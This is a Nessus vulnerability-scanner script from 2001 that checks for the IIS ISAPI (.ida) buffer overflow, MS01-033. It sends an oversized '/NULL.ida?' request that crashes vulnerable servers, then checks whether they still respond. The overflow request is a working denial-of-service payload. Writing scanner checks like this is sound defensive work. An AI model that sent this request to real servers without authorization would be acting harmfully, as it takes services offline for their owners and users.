#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10685);
 
 name["english"] = "IIS ISAPI Overflow";

 script_name(english:name["english"]);

 desc["english"] = "
There's a buffer overflow in the remote web server through
the ISAPI filter.
 
It is possible to overflow the remote web server and execute 
commands as user SYSTEM.

Solution: See http://www.microsoft.com/technet/security/bulletin/ms01-033.asp
Risk Factor : High";

 script_description(english:desc["english"]);

 # Summary
 summary["english"] = "Tests for a remote buffer overflow in IIS";
 script_summary(english:summary["english"]);

 # Category
 script_category(ACT_DENIAL);

 # Dependencie(s)
 script_dependencie("find_service.nes");

 # Family
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"],
               francais:family["francais"]);

 # Copyright
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
                  francais:"Ce script est Copyright (C) 2001 Renaud Deraison");

 script_require_ports("Services/www", 80);
 exit(0);
}

# The attack starts here

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port)) {
    soc = open_sock_tcp(port);
    req = string("GET / HTTP/1.0\r\n\r\n");
    send(socket:soc, data:req);
    r = recv(socket:soc, length:4096);
    close(soc);
    if(!r)
     exit(0);
     
    soc = open_sock_tcp(port);
    req = string("GET /NULL.ida?", crap(250), "=X HTTP/1.1\r\n",
    	     "Host: ", get_host_name(), "\r\n\r\n");

    send(socket:soc, data:req);
    r = recv(socket:soc, length:4096);
    close(soc);

    soc2 = open_sock_tcp(port);
    if(!soc2)
    security_hole(port);
   else
    {
    req = string("GET / HTTP/1.0\r\n\r\n");
    send(socket:soc2, data:req);
    r = recv(socket:soc2, length:4096);
    close(soc2);
    if(!r)
     security_hole(port);
    }
}
